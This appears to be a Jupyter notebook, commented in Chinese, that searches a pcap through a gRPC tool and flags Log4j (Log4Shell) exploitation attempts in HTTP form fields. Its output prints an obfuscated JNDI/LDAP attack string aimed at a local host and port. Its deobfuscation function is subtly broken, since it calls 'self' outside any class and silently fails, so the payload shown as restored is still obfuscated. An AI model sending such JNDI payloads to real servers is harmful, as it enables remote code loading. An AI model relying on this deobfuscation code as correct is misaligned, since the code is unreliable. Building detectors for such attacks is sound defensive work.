In [52]:
# ---------------------------------
# 初始化
# ---------------------------------
import json

# 加载 gRPC 模块接口
from btab import BTAB, Engines, Search

# 初始化系统
btabIns = BTAB()
if btabIns.Ping().Type == "success":
    print("连接成功")

# 检查所有可用引擎
eg = Engines()
if eg.CheckAlive().Type == "success":
    print("检查完成")

连接成功
检查完成


In [53]:

# 初始化查询
# 设置连接设备
search = Search()

# 进行查询
content = """
// 拉取数据
| pcap
|: file log4j_test.pcap
|: fields ["ip.src", "tcp.srcport", "ip.dst", "tcp.dstport","text"]
|: condition http
"""
result1 = search.Submit(content)
# print(result1)
# print(result1.Result)
results = json.loads(result1.Result)
len(results)

2

In [54]:
import re

'''
    用来处理payload，将${:-}、${upper:}、${lower:}这种形式的混肴替换掉，还原出最初的payload
'''

def getrealpayload(data):
    flag = 0
    try:
        lt = re.findall(r'\${(?:(?!\${)[^}])+?}', data)
        for var1 in lt:
            # print(var1)
            if ':-' in var1:
                flag = 1
                if ':-}' in var1:
                    var2 = ''
                else:
                    var2 = re.search(r':-(.+?)}', var1).group(1)
                    # print(var2)
                tmp_data = data.replace(var1, var2)
            elif 'upper' in var1 or 'lower' in var1:
                flag = 1
                var2 = re.search(r'(?:lower|upper):(.+?)}', var1).group(1)
                tmp_data = data.replace(var1, var2)
        if flag == 0:
            return data
        else:
            return self.getrealpayload(tmp_data)
    except:
        return data

finalStatus = False
eventResult = []

for r in results:
    i = json.loads(r)["text"][3]
    print("开始检测：",i)
    try:
        # tmp_data = binascii.a2b_hex(i)
        # 提取出payload
        lt = re.findall(r'\${.+}', i)
        print("提取:", lt)
        for j in lt:
            # 还原payload
            tmp_payload = getrealpayload(j)
            # print(tmp_payload)

            # 对还原后的payload进行判断
            if '${jndi:' in tmp_payload:
                finalStatus = True
                eventResult.append({
                    "name": "检测到log4j漏洞攻击",
                    "status": finalStatus,
                    "desc": f"还原得到 payload :{tmp_payload}"
                })

    except Exception as e:
        print("错误:", e)
        pass
if finalStatus == True:
    print("="*10," 检出 ", "="*10)
    for e in eventResult:
        print(e["name"])
        print(e["desc"])

开始检测： Form item: "a" = "${jndi:ld${:gfdsghsfdhsdfh:-a}p://127.0.0.1:1111/f${lower:s}ad}"
提取: ['${jndi:ld${:gfdsghsfdhsdfh:-a}p://127.0.0.1:1111/f${lower:s}ad}']
开始检测： HTTP chunked response
提取: []
==========  检出  ==========
检测到log4j漏洞攻击
还原得到 payload :${jndi:ld${:gfdsghsfdhsdfh:-a}p://127.0.0.1:1111/f${lower:s}ad}
